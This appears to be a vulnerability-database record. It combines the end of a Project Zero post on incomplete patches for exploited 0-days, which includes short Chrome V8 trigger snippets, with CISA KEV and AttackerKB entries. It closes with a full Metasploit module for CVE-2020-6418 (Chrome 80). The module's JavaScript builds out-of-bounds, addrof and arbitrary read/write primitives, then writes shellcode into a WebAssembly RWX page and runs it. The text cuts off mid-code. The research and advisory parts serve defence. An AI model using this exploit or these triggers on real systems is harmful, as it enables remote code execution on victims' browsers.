\n\nCVE-2020-0986\n\n| \n\nCVE-2020-17008/CVE-2021-1648 \n \n* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild \n \n## Internet Explorer JScript CVE-2020-0674\n\nIn the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn\u2019t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020. We show the trigger in the section above.\n\n## Google Chrome CVE-2019-13674\n\n[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That\u2019s when he realized that the patch didn\u2019t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei\u2019s blog post, \u201c[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\u201d. \n\nTo summarize, the vulnerability is a type confusion in Chrome\u2019s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8\u2019s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8\u2019s integer type is that it is not closed under addition meaning that adding two integers doesn\u2019t always result in an integer. An example of this is +Infinity + -Infinity = NaN. \n\nTherefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you\u2019re interested! \n\nfor (var i = -Infinity; i < 0; i += Infinity) { } \n \n--- \n \n[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.\n\nvar increment = -Infinity;\n\nvar k = 0;\n\n// The initial loop value is 0 and the increment is -Infinity.\n\n// This is permissible because 0 + -Infinity = -Infinity, an integer.\n\nfor (var i = 0; i < 1; i += increment) {\n\nif (i == -Infinity) {\n\n// Once the initial variable equals -Infinity (one loop through)\n\n// the increment is changed to +Infinity. -Infinity + +Infinity = NaN\n\nincrement = +Infinity;\n\n}\n\nif (++k > 10) {\n\nbreak;\n\n}\n\n} \n \n--- \n \nTo \u201crevive\u201d the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity. \n\nUnfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible \u201ctype confusions\u201d. Again, check out [Sergei\u2019s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you\u2019re interested in more details. \n\nThis is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it\u2019s important to work towards \u201ccorrect & comprehensive\u201d patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don\u2019t find and detect all exploited 0-days and we certainly don\u2019t find them all in a timely manner. \n\n## Windows splwow64 CVE-2020-0986\n\nThis vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only[ disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). \n\nMicrosoft\u2019s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn\u2019t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.\n\n# Correct and comprehensive patches\n\nWe\u2019ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year. \n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes. \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.\n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nWhile the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.\n\nIn 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you\u2019re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)\n\nIn addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-03T00:00:00", "type": "googleprojectzero", "title": "\nD\u00e9j\u00e0 vu-lnerability\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", "CVE-2021-1648"], "modified": "2021-02-03T00:00:00", "id": "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "href": "https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Google Chromium V8 Engine contains a type confusion vulnerability which allows a remote attacker to execute code inside a sandbox.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2022-06-08T00:00:00", "id": "CISA-KEV-CVE-2017-5070", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-6418", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-02-06T02:56:52", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T00:00:00", "type": "attackerkb", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2020-07-23T00:00:00", "id": "AKB:1206A37C-0344-4C92-BE29-0F3E27522523", "href": "https://attackerkb.com/topics/rD4CHCKvyf/cve-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:12:59", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 04, 2020 4:42pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**tekwizz123** at March 09, 2020 2:14am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**kevthehermit** at March 04, 2020 4:01pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**gwillcox-r7** at November 22, 2020 2:19am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-07-30T00:00:00", "id": "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66", "href": "https://attackerkb.com/topics/lMn6eEE22f/cve-2020-6418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2022-03-31T19:34:14", "description": "This Metasploit module exploits an issue in Google Chrome version 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "zdt", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34056", "href": "https://0day.today/exploit/description/34056", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => 'Feb 19 2020'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] #{request.body}\")\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() {\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n if 